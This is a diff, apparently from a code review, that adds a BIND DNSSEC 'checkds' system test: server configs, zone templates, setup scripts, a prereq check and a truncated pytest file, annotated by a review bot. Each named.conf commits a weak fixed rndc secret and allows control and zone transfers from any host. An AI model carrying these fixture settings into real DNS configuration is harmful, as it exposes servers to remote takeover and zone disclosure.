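Review bot: The `controls` block in ns2/named.conf.in accepts rndc from `allow { any; }` and authenticates it with `rndc_key`, whose secret `1234abcd8765` is committed in the file; `allow-transfer { any; }` is equally open, and the same stanzas recur in the ns4, ns5, ns6, ns7 and ns9 configs of this commit. Nothing in the file says these settings are fixture-only, and the only thing limiting exposure is the 10.53.0.2 listener, which looks like a harness-private address (inferred, not shown here). I would add one comment above `key rndc_key`, for example `// Test fixture only: fixed rndc secret and open ACLs, reachable only on the system-test addresses.`, so the block is not copied into a real configuration.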
@@ -0,0 +1,34 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. ../../conf.sh
+
+echo_i "ns2/setup.sh"
+
+for subdomain in dspublished reference missing-dspublished bad-dspublished \
+ multiple-dspublished incomplete-dspublished bad2-dspublished \
+ dswithdrawn missing-dswithdrawn bad-dswithdrawn \
+ multiple-dswithdrawn incomplete-dswithdrawn bad2-dswithdrawn
+do
+ cp "../ns9/dsset-$subdomain.checkds$TP" .
+done
+
+zone="checkds"
+infile="checkds.db.infile"
+zonefile="checkds.db"
+
+CSK=$($KEYGEN -k default $zone 2> keygen.out.$zone)
+cat template.db.in "${CSK}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile"
+$SIGNER -S -g -z -x -s now-1h -e now+30d -o $zone -O full -f $zonefile $infile > signer.out.$zone 2>&1
diff --git a/bin/tests/system/checkds/ns2/template.db.in b/bin/tests/system/checkds/ns2/template.db.in
new file mode 100644
index 0000000..ede62ef
--- /dev/null
+++ b/bin/tests/system/checkds/ns2/template.db.in
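Review bot: In ns2/setup.sh errexit is requested only on the interpreter line, `#!/bin/sh -e`, which has no effect when the script is started as `sh setup.sh` or `$SHELL setup.sh` (how the harness invokes it is not visible here); clean.sh in this commit uses `set -e` in the body instead. Without errexit a failed `cp "../ns9/dsset-$subdomain.checkds$TP" .` or a failed `$KEYGEN` would not stop the script, and the later steps would run on incomplete input. I would add `set -e` after the header comment, and the same applies to ns5/setup.sh. The `cp` also relies on the ns9 dsset files already existing, which deserves a comment such as `# requires ns9/setup.sh to have run first`.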
@@ -0,0 +1,38 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA secondary.example. hostmaster.example. (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+
+ NS ns2
+ns2 A 10.53.0.2
+
+dspublished NS ns9.dspublished
+reference NS ns9.reference
+missing-dspublished NS ns9.missing-dspublished
+bad-dspublished NS ns9.bad-dspublished
+multiple-dspublished NS ns9.multiple-dspublished
+incomplete-dspublished NS ns9.incomplete-dspublished
+bad2-dspublished NS ns9.bad2-dspublished
+
+dswithdrawn NS ns9.dswithdrawn
+missing-dswithdrawn NS ns9.missing-dswithdrawn
+bad-dswithdrawn NS ns9.bad-dswithdrawn
+multiple-dswithdrawn NS ns9.multiple-dswithdrawn
+incomplete-dswithdrawn NS ns9.incomplete-dswithdrawn
+bad2-dswithdrawn NS ns9.bad2-dswithdrawn
+
diff --git a/bin/tests/system/checkds/ns4/named.conf.in b/bin/tests/system/checkds/ns4/named.conf.in
new file mode 100644
index 0000000..b5421eb
--- /dev/null
+++ b/bin/tests/system/checkds/ns4/named.conf.in
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS4
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ allow-transfer { any; };
+ recursion no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "checkds" {
+ type secondary;
+ file "checkds.db";
+ primaries { 10.53.0.2 port @PORT@; };
+};
diff --git a/bin/tests/system/checkds/ns5/named.conf.in b/bin/tests/system/checkds/ns5/named.conf.in
new file mode 100644
index 0000000..baab6be
--- /dev/null
+++ b/bin/tests/system/checkds/ns5/named.conf.in
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS5
+
+options {
+ query-source address 10.53.0.5;
+ notify-source 10.53.0.5;
+ transfer-source 10.53.0.5;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.5; };
+ listen-on-v6 { none; };
+ allow-transfer { any; };
+ recursion no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "checkds" {
+ type primary;
+ file "checkds.db";
+};
diff --git a/bin/tests/system/checkds/ns5/setup.sh b/bin/tests/system/checkds/ns5/setup.sh
new file mode 100644
index 0000000..79d7b71
--- /dev/null
+++ b/bin/tests/system/checkds/ns5/setup.sh
@@ -0,0 +1,26 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. ../../conf.sh
+
+echo_i "ns5/setup.sh"
+
+zone="checkds"
+infile="checkds.db.infile"
+zonefile="checkds.db"
+
+CSK=$($KEYGEN -k default $zone 2> keygen.out.$zone)
+cat template.db.in "${CSK}.key" > "$infile"
+private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile"
+$SIGNER -S -g -z -x -s now-1h -e now+30d -o $zone -O full -f $zonefile $infile > signer.out.$zone 2>&1
diff --git a/bin/tests/system/checkds/ns5/template.db.in b/bin/tests/system/checkds/ns5/template.db.in
new file mode 100644
index 0000000..ac3eb8e
--- /dev/null
+++ b/bin/tests/system/checkds/ns5/template.db.in
@@ -0,0 +1,38 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA secondary.example. hostmaster.example. (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+
+ NS ns5
+ns5 A 10.53.0.5
+
+dspublished NS ns9.dspublished
+reference NS ns9.reference
+missing-dspublished NS ns9.missing-dspublished
+bad-dspublished NS ns9.bad-dspublished
+multiple-dspublished NS ns9.multiple-dspublished
+incomplete-dspublished NS ns9.incomplete-dspublished
+bad2-dspublished NS ns9.bad2-dspublished
+
+dswithdrawn NS ns9.dswithdrawn
+missing-dswithdrawn NS ns9.missing-dswithdrawn
+bad-dswithdrawn NS ns9.bad-dswithdrawn
+multiple-dswithdrawn NS ns9.multiple-dswithdrawn
+incomplete-dswithdrawn NS ns9.incomplete-dswithdrawn
+bad2-dswithdrawn NS ns9.bad2-dswithdrawn
+
diff --git a/bin/tests/system/checkds/ns6/named.conf.in b/bin/tests/system/checkds/ns6/named.conf.in
new file mode 100644
index 0000000..53d3a16
--- /dev/null
+++ b/bin/tests/system/checkds/ns6/named.conf.in
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.6;
+ notify-source 10.53.0.6;
+ transfer-source 10.53.0.6;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.6; };
+ listen-on-v6 { none; };
+ allow-transfer { any; };
+ recursion no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "foo" {
+ type primary;
+ file "foo.db";
+};
diff --git a/bin/tests/system/checkds/ns7/named.conf.in b/bin/tests/system/checkds/ns7/named.conf.in
new file mode 100644
index 0000000..a3e3e15
--- /dev/null
+++ b/bin/tests/system/checkds/ns7/named.conf.in
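Review bot: The banner comment in ns6/named.conf.in reads `// NS2`, yet every address in the file is 10.53.0.6 and the README in this commit describes ns6 as the server for a different zone. It looks like a leftover from copying ns2/named.conf.in and should be `// NS6`. A short line under it saying why this server exists, for example `// Serves "foo" only, to act as a badly configured parental agent`, would also explain why it has no `checkds` zone.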
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS7
+
+options {
+ query-source address 10.53.0.7;
+ notify-source 10.53.0.7;
+ transfer-source 10.53.0.7;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.7; };
+ listen-on-v6 { none; };
+ allow-transfer { any; };
+ recursion no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "checkds" {
+ type secondary;
+ file "checkds.db";
+ primaries { 10.53.0.5 port @PORT@; };
+};
diff --git a/bin/tests/system/checkds/ns9/named.conf.in b/bin/tests/system/checkds/ns9/named.conf.in
new file mode 100644
index 0000000..0899f8a
--- /dev/null
+++ b/bin/tests/system/checkds/ns9/named.conf.in
@@ -0,0 +1,218 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS9
+
+options {
+ query-source address 10.53.0.9;
+ notify-source 10.53.0.9;
+ transfer-source 10.53.0.9;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.9; };
+ listen-on-v6 { none; };
+ allow-transfer { any; };
+ recursion no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.9 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+parental-agents "ns2" port @PORT@ {
+ 10.53.0.2;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+/*
+ * Zone with parental agent configured, due for DS checking.
+ */
+zone "dspublished.checkds" {
+ type primary;
+ file "dspublished.checkds.db";
+ inline-signing yes;
+ dnssec-policy "default";
+ parental-agents { 10.53.0.2 port @PORT@; };
+};
+
+/*
+ * Zone with parental agent configured, due for DS checking.
+ * Same as above, but now with a reference to parental-agents.
+ */
+zone "reference.checkds" {
+ type primary;
+ file "reference.checkds.db";
+ inline-signing yes;
+ dnssec-policy "default";
+ parental-agents { "ns2"; };
+};
+
+/*
+ * Zone with parental agent configured, due for DS checking.
+ * The parental agent does not have the DS yet.
+ */
+zone "missing-dspublished.checkds" {
+ type primary;
+ file "missing-dspublished.checkds.db";
+ inline-signing yes;
+ dnssec-policy "default";
+ parental-agents {
+ 10.53.0.5 port @PORT@; // missing
+ };
+};
+
+
+/*
+ * Zone with parental agent configured, due for DS checking.
+ * This case, the server is badly configured.
+ */
+zone "bad-dspublished.checkds" {
+ type primary;
+ file "bad-dspublished.checkds.db";
+ inline-signing yes;
+ dnssec-policy "default";
+ parental-agents {
+ 10.53.0.6 port @PORT@; // bad
+ };
+};
+
+/*
+ * Zone with multiple parental agents configured, due for DS checking.
+ * All need to have the DS before the rollover may continue.
+ */
+zone "multiple-dspublished.checkds" {
+ type primary;
+ file "multiple-dspublished.checkds.db";
+ inline-signing yes;
+ dnssec-policy "default";
+ parental-agents {
+ 10.53.0.2 port @PORT@;
+ 10.53.0.4 port @PORT@;
+ };
+};
+
+/*
+ * Zone with multiple parental agents configured, due for DS checking.
+ * All need to have the DS before the rollover may continue.
+ * This case, one server is still missing the DS.
+ */
+zone "incomplete-dspublished.checkds" {
+ type primary;
+ file "incomplete-dspublished.checkds.db";
+ inline-signing yes;
+ dnssec-policy "default";
+ parental-agents {
+ 10.53.0.2 port @PORT@;
+ 10.53.0.4 port @PORT@;
+ 10.53.0.5 port @PORT@; // missing
+ };
+};
+
+
+/*
+ * Zone with multiple parental agents configured, due for DS checking.
+ * All need to have the DS before the rollover may continue.
+ * This case, one server is badly configured.
+ */
+zone "bad2-dspublished.checkds" {
+ type primary;
+ file "bad2-dspublished.checkds.db";
+ inline-signing yes;
+ dnssec-policy "default";
+ parental-agents {
+ 10.53.0.2 port @PORT@;
+ 10.53.0.4 port @PORT@;
+ 10.53.0.6 port @PORT@; // bad
+ };
+};
+
+// TODO: Other test cases:
+// - Test with bogus response
+// - check with TSIG
+// - check with TLS
+
+
+/*
+ * Zones that are going insecure (test DS withdrawn polling).
+ */
+zone "dswithdrawn.checkds" {
+ type primary;
+ file "dswithdrawn.checkds.db";
+ inline-signing yes;
+ dnssec-policy "insecure";
+ parental-agents { 10.53.0.5 port @PORT@; };
+};
+
+zone "missing-dswithdrawn.checkds" {
+ type primary;
+ file "missing-dswithdrawn.checkds.db";
+ inline-signing yes;
+ dnssec-policy "insecure";
+ parental-agents {
+ 10.53.0.2 port @PORT@; // still published
+ };
+};
+
+zone "bad-dswithdrawn.checkds" {
+ type primary;
+ file "bad-dswithdrawn.checkds.db";
+ inline-signing yes;
+ dnssec-policy "insecure";
+ parental-agents {
+ 10.53.0.6 port @PORT@; // bad
+ };
+};
+
+zone "multiple-dswithdrawn.checkds" {
+ type primary;
+ file "multiple-dswithdrawn.checkds.db";
+ inline-signing yes;
+ dnssec-policy "insecure";
+ parental-agents {
+ 10.53.0.5 port @PORT@;
+ 10.53.0.7 port @PORT@;
+ };
+};
+
+zone "incomplete-dswithdrawn.checkds" {
+ type primary;
+ file "incomplete-dswithdrawn.checkds.db";
+ inline-signing yes;
+ dnssec-policy "insecure";
+ parental-agents {
+ 10.53.0.2 port @PORT@; // still published
+ 10.53.0.5 port @PORT@;
+ 10.53.0.7 port @PORT@;
+ };
+};
+
+zone "bad2-dswithdrawn.checkds" {
+ type primary;
+ file "bad2-dswithdrawn.checkds.db";
+ inline-signing yes;
+ dnssec-policy "insecure";
+ parental-agents {
+ 10.53.0.5 port @PORT@;
+ 10.53.0.7 port @PORT@;
+ 10.53.0.6 port @PORT@; // bad
+ };
+};
diff --git a/bin/tests/system/checkds/ns9/setup.sh b/bin/tests/system/checkds/ns9/setup.sh
new file mode 100644
index 0000000..0990fa3
--- /dev/null
+++ b/bin/tests/system/checkds/ns9/setup.sh
@@ -0,0 +1,63 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. ../../conf.sh
+
+echo_i "ns9/setup.sh"
+
+setup() {
+ zone="$1"
+ echo_i "setting up zone: $zone"
+ zonefile="${zone}.db"
+ infile="${zone}.db.infile"
+ echo "$zone" >> zones
+}
+
+# Short environment variable names for key states and times.
+H="HIDDEN"
+R="RUMOURED"
+O="OMNIPRESENT"
+U="UNRETENTIVE"
+T="now-30d"
+Y="now-1y"
+
+# DS Publication.
+for zn in dspublished reference missing-dspublished bad-dspublished \
+ multiple-dspublished incomplete-dspublished bad2-dspublished
+do
+ setup "${zn}.checkds"
+ cp template.db.in "$zonefile"
+ keytimes="-P $T -P sync $T -A $T"
+ CSK=$($KEYGEN -k default $keytimes $zone 2> keygen.out.$zone)
+ $SETTIME -s -g $O -k $O $T -r $O $T -z $O $T -d $R $T "$CSK" > settime.out.$zone 2>&1
+ cat template.db.in "${CSK}.key" > "$infile"
+ private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile"
+ cp $infile $zonefile
+ $SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+done
+
+# DS Withdrawal.
+for zn in dswithdrawn missing-dswithdrawn bad-dswithdrawn multiple-dswithdrawn \
+ incomplete-dswithdrawn bad2-dswithdrawn
+do
+ setup "${zn}.checkds"
+ cp template.db.in "$zonefile"
+ keytimes="-P $Y -P sync $Y -A $Y"
+ CSK=$($KEYGEN -k default $keytimes $zone 2> keygen.out.$zone)
+ $SETTIME -s -g $H -k $O $T -r $O $T -z $O $T -d $U $T "$CSK" > settime.out.$zone 2>&1
+ cat template.db.in "${CSK}.key" > "$infile"
+ private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile"
+ cp $infile $zonefile
+ $SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1
+done
diff --git a/bin/tests/system/checkds/ns9/template.db.in b/bin/tests/system/checkds/ns9/template.db.in
new file mode 100644
index 0000000..cf06015
--- /dev/null
+++ b/bin/tests/system/checkds/ns9/template.db.in
@@ -0,0 +1,27 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+
+ NS ns9
+ns9 A 10.53.0.9
+
+a A 10.0.0.1
+b A 10.0.0.2
+c A 10.0.0.3
+
diff --git a/bin/tests/system/checkds/prereq.sh b/bin/tests/system/checkds/prereq.sh
new file mode 100644
index 0000000..2204695
--- /dev/null
+++ b/bin/tests/system/checkds/prereq.sh
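Review bot: The `-e` on the `#!/bin/sh -e` line of ns9/setup.sh does not take effect when the script is started as `$SHELL setup.sh`, which is how checkds/setup.sh in this same commit runs it, so a failing `$KEYGEN`, `$SETTIME` or `$SIGNER` call would not stop zone setup unless conf.sh enables errexit itself (not visible here). Adding `set -e` right after `. ../../conf.sh`, as checkds/setup.sh does, makes the intent hold under both invocations. The `cp template.db.in "$zonefile"` at the top of each loop also looks redundant, since `cp $infile $zonefile` overwrites the file a few lines later, and `$zone`, `$infile` and `$zonefile` are quoted in some commands but not in others.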
@@ -0,0 +1,31 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if test -n "$PYTHON"
+then
+ if [ "$($PYTHON -c "import dns.version; print(dns.version.MAJOR)" 2> /dev/null)" -ge 2 ]
+ then
+ :
+ else
+ echo_i "This test requires the dnspython >= 2.0.0 module." >&2
+ exit 1
+ fi
+else
+ echo_i "This test requires Python and the dnspython module." >&2
+ exit 1
+fi
+
+exit 0
diff --git a/bin/tests/system/checkds/setup.sh b/bin/tests/system/checkds/setup.sh
new file mode 100644
index 0000000..93c73b6
--- /dev/null
+++ b/bin/tests/system/checkds/setup.sh
@@ -0,0 +1,40 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. ../conf.sh
+
+set -e
+
+$SHELL clean.sh
+
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+copy_setports ns6/named.conf.in ns6/named.conf
+copy_setports ns7/named.conf.in ns7/named.conf
+copy_setports ns9/named.conf.in ns9/named.conf
+
+# Setup zones
+(
+ cd ns9
+ $SHELL setup.sh
+)
+(
+ cd ns5
+ $SHELL setup.sh
+)
+(
+ cd ns2
+ $SHELL setup.sh
+)
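Review bot: In prereq.sh, when dnspython cannot be imported the command substitution inside `[ "$($PYTHON -c ...)" -ge 2 ]` is empty, so `[` itself reports a non-integer operand on stderr before the intended message is printed; the `2> /dev/null` only covers the Python process. Capturing the value first keeps the output clean: `major=$($PYTHON -c "import dns.version; print(dns.version.MAJOR)" 2> /dev/null) || major=0` followed by `if [ "${major:-0}" -ge 2 ]`.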
diff --git a/bin/tests/system/checkds/tests_checkds.py b/bin/tests/system/checkds/tests_checkds.py
new file mode 100755
index 0000000..a52833e
--- /dev/null
+++ b/bin/tests/system/checkds/tests_checkds.py
@@ -0,0 +1,450 @@ +#!/usr/bin/python3 + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +import mmap +import os +import subprocess +import sys +import time + +import pytest + +pytest.importorskip("dns", minversion="2.0.0") +import dns.exception +import dns.message +import dns.name +import dns.query +import dns.rcode +import dns.rdataclass +import dns.rdatatype +import dns.resolver + + +pytestmark = pytest.mark.skipif( + sys.version_info < (3, 7), reason="Python >= 3.7 required [GL #3001]" +) + + +def has_signed_apex_nsec(zone, response): + has_nsec = False + has_rrsig = False + + ttl = 300 + nextname = "a." + types = "NS SOA RRSIG NSEC DNSKEY CDS CDNSKEY" + match = "{0} {1} IN NSEC {2}{0} {3}".format(zone, ttl, nextname, types) + sig = "{0} {1} IN RRSIG NSEC 13 2 300".format(zone, ttl) + + for rr in response.answer: + if match in rr.to_text(): + has_nsec = True + if sig in rr.to_text(): + has_rrsig = True + + if not has_nsec: + print("error: missing apex NSEC record in response") + if not has_rrsig: + print("error: missing NSEC signature in response") + + return has_nsec and has_rrsig + + +def do_query(server, qname, qtype, tcp=False): + query = dns.message.make_query(qname, qtype, use_edns=True, want_dnssec=True) + try: + if tcp: + response = dns.query.tcp( + query, server.nameservers[0], timeout=3, port=server.port + ) + else: + response = dns.query.udp( + query, server.nameservers[0], timeout=3, port=server.port + ) + except dns.exception.Timeout: + print( + "error: query timeout for query {} {} to {}".format( + qname, qtype, server.nameservers[0] + ) + ) + return None + + return response + + 
+def verify_zone(zone, transfer): + verify = os.getenv("VERIFY") + assert verify is not None + + filename = "{}out".format(zone) + with open(filename, "w", encoding="utf-8") as file: + for rr in transfer.answer: + file.write(rr.to_text()) + file.write("\n") + + # dnssec-verify command with default arguments. + verify_cmd = [verify, "-z", "-o", zone, filename] + + verifier = subprocess.run(verify_cmd, capture_output=True, check=True) + + if verifier.returncode != 0: + print("error: dnssec-verify {} failed".format(zone)) + sys.stderr.buffer.write(verifier.stderr) + + return verifier.returncode == 0 + + +def read_statefile(server, zone): + addr = server.nameservers[0] + count = 0 + keyid = 0 + state = {} + + response = do_query(server, zone, "DS", tcp=True) + if not isinstance(response, dns.message.Message): + print("error: no response for {} DS from {}".format(zone, addr)) + return {} + + if response.rcode() == dns.rcode.NOERROR: + # fetch key id from response. + for rr in response.answer: + if rr.match( + dns.name.from_text(zone), + dns.rdataclass.IN, + dns.rdatatype.DS, + dns.rdatatype.NONE, + ): + if count == 0: + keyid = list(dict(rr.items).items())[0][0].key_tag + count += 1 + + if count != 1: + print( + "error: expected a single DS in response for {} from {}," + "got {}".format(zone, addr, count) + ) + return {} + else: + print( + "error: {} response for {} DNSKEY from {}".format( + dns.rcode.to_text(response.rcode()), zone, addr + ) + ) + return {} + + filename = "ns9/K{}+013+{:05d}.state".format(zone, keyid) + print("read state file {}".format(filename)) + + try: + with open(filename, "r", encoding="utf-8") as file: + for line in file: + if line.startswith(";"): + continue + key, val = line.strip().split(":", 1) + state[key.strip()] = val.strip() + + except FileNotFoundError: + # file may not be written just yet. + return {} + + return state + + +def zone_check(server, zone): + addr = server.nameservers[0] + + # wait until zone is fully signed. 
+ signed = False + for _ in range(10): + response = do_query(server, zone, "NSEC") + if not isinstance(response, dns.message.Message): + print("error: no response for {} NSEC from {}".format(zone, addr)) + elif response.rcode() == dns.rcode.NOERROR: + signed = has_signed_apex_nsec(zone, response) + else: + print( + "error: {} response for {} NSEC from {}".format( + dns.rcode.to_text(response.rcode()), zone, addr + ) + ) + + if signed: + break + + time.sleep(1) + + assert signed + + # check if zone if DNSSEC valid. + verified = False + transfer = do_query(server, zone, "AXFR", tcp=True) + if not isinstance(transfer, dns.message.Message): + print("error: no response for {} AXFR from {}".format(zone, addr)) + elif transfer.rcode() == dns.rcode.NOERROR: + verified = verify_zone(zone, transfer) + else: + print( + "error: {} response for {} AXFR from {}".format( + dns.rcode.to_text(transfer.rcode()), zone, addr + ) + ) + + assert verified + + +def keystate_check(server, zone, key): + val = 0 + deny = False + + search = key + if key.startswith("!"): + deny = True + search = key[1:] + + for _ in range(10): + state = read_statefile(server, zone) + try: + val = state[search] + except KeyError: + pass + + if not deny and val != 0: + break + if deny and val == 0: + break + + time.sleep(1) + + if deny: + assert val == 0 + else: + assert val != 0 + + +def wait_for_log(filename, log): + found = False + + for _ in range(10): + print("read log file {}".format(filename)) + + try: + with open(filename, "r", encoding="utf-8") as file: + s = mmap.mmap(file.fileno(), 0, access=mmap.ACCESS_READ) + if s.find(bytes(log, "ascii")) != -1: + found = True + except FileNotFoundError: + print("file not found {}".format(filename)) + + if found: + break + + print("sleep") + time.sleep(1) + + assert found + + +def test_checkds_dspublished(named_port): + # We create resolver instances that will be used to send queries. 
